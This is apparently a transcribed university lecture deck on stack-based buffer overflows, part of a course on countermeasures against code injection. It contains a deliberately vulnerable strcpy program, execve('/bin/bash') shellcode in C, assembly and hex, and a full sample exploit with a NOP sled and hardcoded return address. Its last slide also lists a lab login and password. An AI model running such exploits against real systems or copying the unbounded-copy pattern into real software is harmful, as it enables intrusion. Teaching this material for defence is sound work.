200 likes | 459 Views
Stack-based buffer overflows. Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be. Overview. Introduction Buffer overflows Stack-based buffer overflows Shellcode Code injection Conclusion. Introduction.
E N D
Stack-based buffer overflows Yves Younan DistriNet, Department of Computer Science Katholieke Universiteit Leuven Belgium Yves.Younan@cs.kuleuven.ac.be
Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Introduction • Buffer overflows: write outside the boundaries of an array • Can be used to overwrite adjacent memory • The stack contains control-flow related data, e.g. return addresses • Overwriting this data allows an attacker to execute new or existing code Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Buffer overflows (on IA32) • int main(int argc, char **argv) { int a; char buf[100]; strcpy(buf, argv); } • Int a is allocated on the stack: 4 bytes • Buf has memory allocated for 100 chars: 100 bytes • Argv could be larger than that, allowing an attacker to overwrite a in this example Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Buffer overflow on IA32 High addr int a char buf[100] Low addr Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Stack based buffer overflows • void f1(char *a) { char buffer[100]; strcpy(buffer, a); } • void f0(char *b) { f1(b); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Stack-based buffer overflows Stack High addr f0: Return address f0 … Saved Frame Ptr f0 Stack frame f0 call f1 Local variables f0 … Arguments f1 f1: buffer[] Return address f1 overflow() … Saved Frame Ptr f1 Stack frame f1 Injected code Buffer Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Shellcode • Code to execute once the return address has been overwritten • Usually inserted into buffer that is used to overflow • Some subtleties: a NULL will terminate an strcpy, \n will terminate gets Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Example code • #include <unistd.h> int main() { char *argv[2]; argv[0] = "/bin/bash"; argv[1] = 0; execve(argv[0], argv, 0); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Example transformed to assembly • .type main,@function main: push $0x68 # Place h on the stack. push $0x7361622f # Place sab/ on the stack. push $0x6e69622f # Place nib/ on the stack. mov %esp,%ebx # Copy the pointer to /bin/bash to ebx. xor %edx,%edx # Empty edx. push %edx # Place a NULL on the stack to terminate the argv. push %ebx # Place the pointer to /bin/bash on the stack. mov %esp,%ecx # Copy the pointer to the pointer to /bin/bash into ecx. mov $0xb,%eax # Let the syscall know we want execve int $0x80 # Do the system call Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Shellcode • (gdb) x/27b main • 0x8048308 <main>: 0x6a 0x68 0x68 0x2f 0x62 0x61 0x73 0x68 • 0x8048310 <main+8>: 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x31 0xd2 • 0x8048318 <main+16>: 0x52 0x53 0x89 0xe1 0xb8 0x0b 0x00 0x00 • 0x8048320 <main+24>: 0x00 0xcd 0x80 Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Shellcode • .globl main .type main,@function main: push $0x68 push $0x7361622f push $0x6e69622f mov %esp,%ebx xor %edx,%edx push %edx push %ebx mov %esp,%ecx xor %eax,%eax # set %eax to 0 mov $0xb,%al # copy 0xb into %al (least signicant byte of %eax) int $0x80 Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Overview • Introduction • Buffer overflows • Stack-based buffer overflows • Shellcode • Code injection • Conclusion Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Sample vulnerable program • void function(inta, char *b) { charstring1[10]; charstring2[50]; strcpy(string2,b); } intmain(intargc, char **argv) { function(1,argv[1]); } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Sample exploit • #include <stdio.h> #include <stdlib.h> char shellcode[] = "\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89" "\xe3\x31\xd2\x52\x53\x89\xe1\x31\xc0\xb0\x0b\xcd\x80"; #define ADDR 0xbffffe2c int main() { char overflow[72]; char *argv[3] = { "./bufferoverflow", overflow, NULL }; memset(overflow,'\x90',72); // fill with NOPs *(long *) &overflow[68] = ADDR; // replace ret. addr. memcpy(overflow, shellcode, strlen(shellcode)); execve(argv[0],argv,0); // exex program } Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks
Conclusion • Follow “Gera’s Insecure Programming by example”: • http://community.corest.com/~gera/InsecureProgramming/ • Login/pass for the computers: cstudy/distrinet Yves Younan - Methodology for Designing Countermeasures against Code injection Attacks